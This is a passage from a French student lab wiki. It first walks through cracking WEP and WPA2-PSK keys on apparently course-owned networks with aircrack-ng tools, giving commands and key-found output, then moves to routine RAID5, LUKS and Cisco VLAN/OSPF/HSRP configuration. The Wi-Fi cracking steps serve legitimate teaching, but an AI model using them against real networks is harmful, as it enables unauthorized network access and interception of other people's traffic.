'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. &lt;br /&gt;
==== Remettre à zero la clef USB ====&lt;br /&gt;
Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sda''' (il peut aussi s'appeler sdb ,sdc ...)&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sda&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1): '''1'''&lt;br /&gt;
First sector (1-1953525167, default 2048):'''1'''&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size 7.1GiB.&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de la Clef ====&lt;br /&gt;
La clef est prête, on peut desormais crypter et l'utiliser avec l'utilitaire cyptsetup.&lt;br /&gt;
Pour créer le cryptage au format Luks :&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
==== Accès à la partition cryptée ====&lt;br /&gt;
Maintenant que la clef est cryptée, on peut l'utiliser. Pour commencer, on va monter le répertoire pour pouvoir l'ouvrir. Commencez par créer un repertoire '''/mnt/clef_usb_cryptee''' puis taper la suite de commande :&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb home -- ouverture de la clef&lt;br /&gt;
    mkfs.ext4 /dev/mapper/home -- Système de fichier relié &lt;br /&gt;
    mount -t ext4 /dev/mapper/home /mnt/clef_usb_cryptee&lt;br /&gt;
&lt;br /&gt;
On peut maintenant acceder au contenu de la clef et le modifier via le dossier '''/mnt/clef_usb_cryptee'''&lt;br /&gt;
&lt;br /&gt;
==== Debrancher la partition cryptée ====&lt;br /&gt;
Pour débrancher la clef, il faut au préalable démonter la partition et refermer l'utilitaire via les commandes:&lt;br /&gt;
  umount /mnt/clef_usb_cryptee -- Demonter le repertoire&lt;br /&gt;
  cryptsetup close --type luks home&lt;br /&gt;
Et voila, vous pouvez désormais retirer la clef.&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
